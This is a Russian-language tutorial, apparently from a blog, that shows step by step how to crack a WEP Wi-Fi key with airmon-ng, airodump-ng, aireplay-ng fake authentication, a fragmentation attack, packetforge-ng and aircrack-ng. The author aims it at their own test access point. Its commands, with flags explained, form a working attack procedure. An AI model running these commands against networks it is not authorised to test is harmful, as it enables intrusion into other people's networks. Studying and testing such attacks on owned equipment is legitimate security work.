Всем привет!
Начинается цикл статей по анализу и взлому wi-fi сетей. Постараюсь по возможности рассказывать, как можно подробно. Останавливаясь на интересных моментах. Если вы по каким то причинам вы не знаете теорию беспроводных сетей, то рекомендую прочитать статью “
Введение в беспроводные сети“.
Итак, начну с самого начала, чтобы некоторые вопросы отпали сами собой.
Перевести интерфейс в monitor mode
Для того, чтобы просканировать доступные wi-fi сети, нужно сначала перевести интерфейс wi-fi клиента в режим монитора (monitor mode). Для начала посмотрим, какие беспроводные интерфейсы имеются.
У меня доступны два интерфейса: wlan0 и wlan1. wlan0 это обычный и ничем не примечательный wi-fi клиент, который в данной ситуации не нужен. wlan1 – специализированный беспроводной клиент (
ALFA AWUS036H), который как раз нужно перевести в режим монитора. Делается это следующим способом:
Код:
|
airmon-ng start wlan1 |
Как видно из листинга, wlan1 создает виртуальный интерфейс mon0, который находится в режиме монитора (monitor mode).
Теперь можем сканировать wi-fi сети. Опять напомню, что выдаются только те AP, в зоне действия которых находимся.
Для справки: можно конечно увеличить область приема. Для этого необходимо приобрести узконаправленную антенну с большим коэффициентом усиления, например от 15 до 20 dbi. В wi-fi клиенте, который использую я, коэффициент усиления антенны составляет 5 dbi. В стандартных wi-fi клиентах и точках доступа (AP) используется ненаправленные антенны (с круговой диаграммой направленности) и коэффициентом усиления от 2 до 3 dbi.
Из листинга видим, какие точки доступа находятся в радиусе действия. Но так как закон нарушать очень не хорошо, я буду проводить взлом wi-fi на своей тестовой точке доступа (SSID: hub-lex-AP, канал: 1, MAC-адрес: BC:AE:C5:71:D3:17).
Настройка интерфейса завершена. Теперь займемся непосредственно взломом wi-fi.
Fragmentation attack
Итак, осталось только настроить интерфейс mon0 на конкретную точку доступа (AP). Если этого не сделать, mon0 будет и дальше мониторить все каналы. Следующая команда переводит интерфейс на тестовую wi-fi сеть hub-lex-AP.
Код:
|
airodump-ng -c 1 -w wep --bssid BC:AE:C5:71:D3:17 mon0 |
-c – номер канала
-w – название дамп-файла
–bssid – MAC-адрес точки доступа
Первое, что необходимо, это подключиться к точке доступа. Следующая команда (
fake_authentication) позволяет это сделать.
Код:
|
aireplay-ng -1 0 -a BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A mon0 |
-1 – фиктивная аутентификация
0 – реассоциация времени (сек.)
-a – MAC-адрес точки доступа
-h – MAC-адрес клиента, который используем
Аутентификация прошла успешно. В столбце AUTH видна надпись OPN.
Далее будем использовать
Fragmentation attack. Fragmentation attack позволяет получить ключевой поток длины 1500 байт, что позволит затем отсылать произвольные пакеты в сеть.
Код:
|
aireplay-ng -5 -b BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A mon0 |
-5 – fragmentation attack
-b – MAC-адрес точки доступа
-h – MAC-адрес клиента
Теперь воспользуемся
packetforge-ng, чтобы создать шифрованный пакет.
Код:
|
packetforge-ng -0 -a BC:AE:C5:71:D3:17 -h 00:C0:CA:30:85:7A -k 255.255.255.255 -l 255.255.255.255 -y fragment-1210-103644.xor -w arp |
-0 – генерировать ARP-пакет
-a – MAC-адрес точки доступа
-h – MAC-адрес клиента
-k – IP получателя
-l – IP отправителя
-y – чтение PRGA из файла
-w – записать пакет в pcap-файл
Далее используем
Interactive packet replay (интерактивная генерация пакетов).
Код:
|
aireplay-ng -2 -r arp mon0 |
-2 – interactive replay attack
-r – имя pcap-файла
Осталось подождать пока соберется достаточное количество Data-пакетов.
Data-пакеты собраны. Требуется расшифровать их.
Код:
|
aircrack-ng -a 1 -0 wep-01.cap |
-a – bruto-force атака (1 = WEP, 2 = WPA/WPA2-PSK)
1 – WEP
-0 – использовать цвет
Вот и все. Как видите ничего сложного нет. Если возникнут вопросы, обращайтесь.